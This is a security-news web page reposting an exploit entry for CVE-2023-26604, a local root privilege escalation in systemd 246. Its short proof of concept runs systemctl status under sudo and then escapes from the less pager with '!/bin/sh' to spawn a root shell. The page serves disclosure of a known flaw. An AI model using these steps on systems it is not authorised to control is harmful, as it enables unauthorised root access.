Home Tools Exploits & CVE's systemd 246 Local Root Privilege Escalation

systemd 246 Local Root Privilege Escalation

August 14, 2023

296

systemd version 246 suffers from a local root privilege escalation vulnerability.

advisories | CVE-2023-26604

# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604

systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. 
This vulnerability allows a local attacker to gain root privileges.

## Proof Of Concept:
1. Run the systemctl command which can be run as root user.

sudo /usr/bin/systemctl status any_service

2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.

3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

systemd 246 Local Root Privilege Escalation

Follow us on Instagram @thecyberpost

EDITOR PICKS

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Zoo Management System 1.0 Cross Site Scripting

Barebones CMS 2.0.2 Cross Site Scripting

VulturiBuilder Insecure Permissions